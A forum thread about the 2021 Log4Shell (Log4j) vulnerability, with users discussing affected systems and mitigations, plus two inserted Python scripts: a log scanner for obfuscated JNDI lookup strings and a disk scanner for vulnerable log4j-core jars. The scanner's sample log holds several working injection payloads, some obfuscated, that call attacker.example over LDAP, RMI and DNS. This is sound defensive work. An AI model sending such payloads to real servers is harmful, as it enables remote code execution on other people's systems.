12-12-2021, 12:07 PM   #16
Pentaxian | Join Date: Jul 2009 | Location: Pugetopolis | Posts: 11,008
What's not clear to me is if this is common to ALL platforms running Apache's Log4j. I mean, often a vulnerability is also specific to the operating system. And an advisory often notes that but I didn't see a mention of that in the OP's links. I'd think a ported Windows version of Log4j is not the same code as say a native Linux version of Apache's Log4j. But beats me.

12-12-2021, 01:05 PM   #17
Pentaxian | Join Date: Apr 2007 | Location: Romania | Posts: 15,132
Originally posted by tuco:
What's not clear to me is if this is common to ALL platforms running Apache's Log4j. I mean, often a vulnerability is also specific to the operating system. And an advisory often notes that but I didn't see a mention of that in the OP's links. I'd think a ported Windows version of Log4j is not the same code as say a native Linux version of Apache's Log4j. But beats me.
All platforms are affected, AFAIK. This is a Java library.
12-12-2021, 01:28 PM   #18
Pentaxian | Join Date: Jul 2009 | Location: Pugetopolis | Posts: 11,008
Originally posted by Kunzite:
All platforms are affected, AFAIK. This is a Java library.
Okay thanks. Java code is multi-platform, but I'd think the underlying libraries for say directory access and what-not would be different enough from Windows to Unix in the compiled binary that it might affect the vulnerability. And the link to get an update looked like Linux tarballs.
12-12-2021, 03:10 PM   #19
Pentaxian Paul the Sunman | Join Date: Aug 2011 | Location: Melbourne | Posts: 4,836
Are Apache legally liable for any damage inflicted due to the massive hole in their software?

12-12-2021, 03:54 PM   #20
Moderator, Site Supporter MarkJerling | Join Date: May 2012 | Location: Wairarapa, New Zealand | Posts: 20,391
Originally posted by beholder3:
That is interesting. Running the download through Microsoft's virustotal yields zero issues.
If you use the Lite version without web functions that's even safer.

Which software claimed the "unsafe"?
Windows Defender, or whatever it calls itself these days. Windows 10 anyway, gives me warnings when I try to download it and when I try to run it. Untrusted source and blah blah.
12-12-2021, 05:18 PM   #21
Loyal Site Supporter MossyRocks | Join Date: Nov 2017 | Location: Minnesota | Posts: 2,978
Originally posted by Paul the Sunman:
Are Apache legally liable for any damage inflicted due to the massive hole in their software?
Nope. All software makers disclaim any liability, even for software you actually pay for. However, open-source software projects usually do a better job of fixing things like this than closed-source software. I had to use log4j once on a project at work and it was an awful complex mess even back then.
12-12-2021, 10:49 PM   #22
Site Supporter | Join Date: Aug 2015 | Location: Alabama | Posts: 693
Thanks for the info. Found it as part of a mathlab app

12-13-2021, 01:36 AM   #23
Digitiser of Film, Loyal Site Supporter BigMackCam | Join Date: Mar 2010 | Location: North East of England | Posts: 20,571
Originally posted by Kunzite:
It's with a certain Java library called log4j, which (unsurprisingly) is used to write application logs... except that an attacker might control what's written in the log, and the vulnerability means they could gain access to the system this way.

I'm not exactly clear on what it does and how; that's a subject for tomorrow (i.e. work day)
But the advice to update Java stands. Later versions (even later Java 8 versions) would mitigate at least partially this issue.

log4j is not used only by Apache web server.
I'm still not sure I understand the vulnerability fully, or rather how it's exploited

A quick search on my Windows 10 installation (I haven't checked Ubuntu yet) shows I have log4j-core-2.12.0.jar and log4j-api-2.12.0.jar in the lib directory of my Arduino IDE installation, and some brief digging suggests that IDE uses log4j for debug logging... but unless someone can remotely connect to my PC, how can they exploit the vulnerability? With an adequate firewall and correctly-managed ports, local application use of log4j should be safe, shouldn't it? GRC ShieldsUP! confirms my router isn't responding to UPnP probing, and all my ports have "stealth" status...

Last edited by BigMackCam; 12-13-2021 at 01:42 AM.
12-13-2021, 01:55 AM   #24
Pentaxian | Join Date: Apr 2007 | Location: Romania | Posts: 15,132
Well, on Minecraft it apparently can be exploited just by typing stuff in the chat window

The attacker only needs to make your app log certain stuff (through log4j).
Updating Java is good advice, but it doesn't (fully) close the vulnerability. You'd have to update log4j to 2.15.0 - or rather, update your apps using log4j to versions including it.
Until these are available, this is what Apache recommends:
Quote:
Mitigation: In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and <=2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
https://logging.apache.org/log4j/2.x/security.html

But I expect everyone's in a hurry to update their apps
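The post above gives the whole mechanism in one line: the attacker only has to get a string into something the application logs. The string is a log4j lookup, `${jndi:...}`, and in practice attackers wrap it in other lookups (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) so that a naive search for the literal text misses it. The script below is an added example, not code from the thread or from the Log4j project: it peels those nested lookups back to what log4j would have evaluated them to and then looks for the `${jndi:` prefix. The access-log lines in SAMPLE_LOG are constructed, with the attacker's payload placed in the User-Agent and query string, two fields that routinely end up in a log4j-backed log.

```python
"""Detect Log4Shell lookup strings (CVE-2021-44228) in log lines, including the
nested-lookup obfuscations that hide the literal "${jndi:" prefix."""
import re
from typing import List, Optional, Tuple

# An innermost lookup: "${...}" whose body contains no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately looking for, once obfuscation is peeled away.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve_inner(body: str) -> Optional[str]:
    """Evaluate one obfuscating lookup to the literal it yields.

    Handles the idioms seen in the wild: ${lower:X}, ${upper:X}, and the
    default-value form ${prefix:key:-X} (e.g. ${::-j} or ${env:NOPE:-j}),
    which evaluates to X when the lookup is undefined. Anything else,
    including the jndi lookup itself, is left in place (None).
    """
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return None
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if lowered.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalise(message: str, max_rounds: int = 20) -> str:
    """Repeatedly replace innermost obfuscating lookups until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            resolved = _resolve_inner(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        message = _INNER.sub(repl, message)
        if not changed:
            break
    return message


def is_log4shell_probe(message: str) -> bool:
    return _JNDI.search(normalise(message)) is not None


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, normalised line) for each suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        norm = normalise(line)
        if _JNDI.search(norm):
            hits.append((number, norm))
    return hits


# Constructed sample: a web server access log where the User-Agent and query
# string are attacker-controlled and end up in a log4j-backed log.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:06 +0000] "GET /?q=${${env:NOPE:-j}ndi:dns://attacker.example/a} HTTP/1.1" 400 "-" "curl/7.79"',
    '10.0.0.7 - - [12/Dec/2021:10:01:07 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for number, line in scan_lines(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

Two caveats for anyone running this over real logs. A hit in a web server's access log only tells you someone tried; whether it worked depends on the application behind it having logged the same string through a vulnerable log4j-core. And the normalisation covers the common obfuscations only, so treat it as a triage filter, not as proof of absence.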
12-13-2021, 02:14 AM   #25
Digitiser of Film, Loyal Site Supporter BigMackCam | Join Date: Mar 2010 | Location: North East of England | Posts: 20,571
Originally posted by Kunzite:
Well, on Minecraft it apparently can be exploited just by typing stuff in the chat window

The attacker only needs to make your app log certain stuff (through log4j).
Updating Java is good advice, but it doesn't (fully) close the vulnerability. You'd have to update log4j to 2.15.0 - or rather, update your apps using log4j to versions including it.
Until these are available, this is what Apache recommends:

https://logging.apache.org/log4j/2.x/security.html

But I expect everyone's in a hurry to update their apps
I've already added LOG4J_FORMAT_MSG_NO_LOOKUPS = true to my environment variables, updated my Java SDK and runtime, and I'm running the latest version of Arduino IDE (although it's still using v2.12 of log4j). I'm not sure there's much else I can do at this point... nor, indeed, if the few online services I connect to put me at any real risk...

Last edited by BigMackCam; 12-13-2021 at 02:48 AM.
12-13-2021, 03:16 AM   #26
Pentaxian Lord Lucan | Join Date: Sep 2017 | Location: South Wales | Posts: 2,898
Originally posted by StiffLegged:
I don't run Apache in any shape or form
Yes, that's unlikely because it is web-serving software - and very widely used.

Pentaxforums uses it.
12-13-2021, 04:28 AM - 1 Like   #27
Digitiser of Film, Loyal Site Supporter BigMackCam | Join Date: Mar 2010 | Location: North East of England | Posts: 20,571
The more I read of this, the more it seems to be worth setting environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS = true just as a precautionary measure, whether or not you think you might have apps using log4j, and regardless of which OS you're using. Apparently, this mitigates the vulnerability for log4j versions 2.10 onwards, and it's simple enough that anyone can do it so long as they have (or can obtain) admin / supervisor rights to their machine. At worst, it'll have no effect whatsoever... at best, it stops the issue in its tracks.

For Windows 10, I did this by going to Start Menu -> System -> Advanced system settings -> Environment Variables and adding a System Variable.

In Ubuntu, I edited /etc/environment using a command line editor with supervisor rights, and added the environment variable to the end of the file. In my case, I entered: sudo nano /etc/environment [others should replace "nano" with the name of their favourite installed editor]

I don't know how you'd do it on a Mac, but I'm guessing it'll be fairly similar to Ubuntu...

Last edited by BigMackCam; 12-13-2021 at 05:47 AM.
12-13-2021, 04:56 AM - 1 Like   #28
Site Supporter StiffLegged | Join Date: Jan 2018 | Posts: 4,560
Originally posted by BigMackCam:
The more I read of this, the more it seems to be worth setting environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS = true just as a precautionary measure, whether or not you think you might have apps using log4j, and regardless of which OS you're using. Apparently, this mitigates the vulnerability for log4j versions 2.10 onwards, and it's simple enough that anyone can do it so long as they have (or can obtain) admin / supervisor rights to their machine. At worst, it'll have no effect whatsoever... at best, it stops the issue in its tracks.

For Windows 10, I did this by going to Start Menu -> System -> Advanced system settings -> Environment Variables and adding a System Variable.
Thanks Mike, that’s a big help.
12-14-2021, 04:34 AM   #29
Pentaxian | Join Date: May 2015 | Posts: 1,930
If I do a search for "log4j" and nothing is found am I right to think I am safe?

12-14-2021, 05:27 AM   #30
Digitiser of Film, Loyal Site Supporter BigMackCam | Join Date: Mar 2010 | Location: North East of England | Posts: 20,571
Originally posted by slartibartfast01:
If I do a search for "log4j" and nothing is found am I right to think I am safe?
Search for log4j*.* or log4j*.jar - and make sure you begin the search from the root directory, including all sub-directories, and with supervisor rights. Do this for all user accounts on your PC. If no matching files are found, you should be fine... However, if you add the environment variable described above in the manner I detailed, then even if you do have log4j on your machine, this will close the vulnerability - at least for versions 2.10 onwards (current full release version is 2.14, I think, with a new 2.15 in beta to address this very problem). I'd recommend adding the environment variable regardless of whether you find any matching files. Belt and braces, so to speak
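The advice in the last few posts (search the whole disk for log4j jars, set LOG4J_FORMAT_MSG_NO_LOOKUPS=true for 2.10 onwards, strip JndiLookup.class from older releases, upgrade to 2.15.0) can be turned into a single check. The script below is an added example, not code from the thread or from the Log4j project: it walks a directory tree for log4j-core jars, reads the version from the filename, looks inside each jar for JndiLookup.class, and reports which of the mitigations quoted from the Apache advisory actually covers that version. Note that only log4j-core carries the vulnerable class, so the log4j-api jar the post mentions alongside it is ignored. The fixture built by build_demo_tree is constructed (empty jars with realistic names and entries) so the script runs offline; a real run would be over / or C:\ with admin rights, as the post says. It does not see log4j copies repackaged inside other jars, and it skips pre-release names such as 2.0-beta9.

```python
"""Locate log4j-core jars and decide which of the mitigations Apache lists
(quoted in the thread) apply to each one for CVE-2021-44228."""
import os
import re
import sys
import tempfile
import zipfile
from typing import Dict, List, NamedTuple, Tuple

JNDI_LOOKUP_ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Only log4j-core carries JndiLookup; log4j-api-*.jar is harmless on its own.
# Pre-release names such as log4j-core-2.0-beta9.jar do not match and are skipped.
_CORE_JAR = re.compile(r"^log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$", re.IGNORECASE)


class Finding(NamedTuple):
    path: str
    version: Tuple[int, int, int]
    jndi_lookup_present: bool
    status: str   # "fixed", "mitigated" or "vulnerable"
    advice: str


def env_flag_is_set(environ=None) -> bool:
    """True when LOG4J_FORMAT_MSG_NO_LOOKUPS=true is set in the given environment."""
    environ = os.environ if environ is None else environ
    return environ.get("LOG4J_FORMAT_MSG_NO_LOOKUPS", "").strip().lower() == "true"


def assess(version: Tuple[int, int, int], jndi_lookup_present: bool,
           env_flag_set: bool) -> Tuple[str, str]:
    """Apply the version ranges from the Apache advisory quoted in the thread."""
    if version >= (2, 15, 0):
        return "fixed", "at or above 2.15.0, the release the advisory names for this issue"
    if not jndi_lookup_present:
        return "mitigated", "JndiLookup.class has already been removed from the jar"
    if version >= (2, 10, 0):
        if env_flag_set:
            return ("mitigated", "LOG4J_FORMAT_MSG_NO_LOOKUPS=true is honoured from 2.10; "
                                 "still upgrade when the vendor ships a fixed build")
        return ("vulnerable", "set LOG4J_FORMAT_MSG_NO_LOOKUPS=true "
                              "(or -Dlog4j2.formatMsgNoLookups=true) or upgrade")
    return ("vulnerable", "the environment variable is ignored below 2.10: run "
                          f"zip -q -d <jar> {JNDI_LOOKUP_ENTRY} or upgrade")


def scan(root: str, env_flag_set: bool) -> List[Finding]:
    findings: List[Finding] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            m = _CORE_JAR.match(name)
            if not m:
                continue
            path = os.path.join(dirpath, name)
            version = (int(m.group(1)), int(m.group(2)), int(m.group(3)))
            try:
                with zipfile.ZipFile(path) as jar:
                    present = JNDI_LOOKUP_ENTRY in jar.namelist()
            except (zipfile.BadZipFile, OSError):
                continue   # unreadable, or not really a jar
            status, advice = assess(version, present, env_flag_set)
            findings.append(Finding(path, version, present, status, advice))
    return findings


def build_demo_tree(root: str) -> None:
    """Constructed fixture: jars that are realistic only in name and entry list."""
    cases = [
        ("arduino/lib/log4j-core-2.12.0.jar", True),    # the version found in the thread
        ("arduino/lib/log4j-api-2.12.0.jar", False),    # api jar: must be ignored
        ("legacy/log4j-core-2.9.1.jar", True),          # too old for the env var
        ("patched/log4j-core-2.14.1.jar", False),       # class stripped with zip -d
        ("new/log4j-core-2.15.0.jar", True),
    ]
    for rel, with_class in cases:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as jar:
            jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            if with_class:
                jar.writestr(JNDI_LOOKUP_ENTRY, b"\xca\xfe\xba\xbe")  # class-file magic only


def demo(env_flag_set: bool = False) -> Dict[str, str]:
    """Build the fixture in a temp dir, scan it, return {jar name: status}."""
    with tempfile.TemporaryDirectory() as root:
        build_demo_tree(root)
        return {os.path.basename(f.path): f.status for f in scan(root, env_flag_set)}


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for f in scan(sys.argv[1], env_flag_is_set()):
            print(f"{f.status:10s} {f.path}  ({f.advice})")
    else:
        for jar, status in sorted(demo(env_flag_is_set()).items()):
            print(f"{status:10s} {jar}")
```

Run it with no argument to see the fixture results, or with a directory (for example `python scan_log4j.py /`) to scan a real tree; the environment variable is read from the shell that launches the script, so after editing /etc/environment or the Windows System Variables as described above, log out and back in before trusting the "mitigated" result.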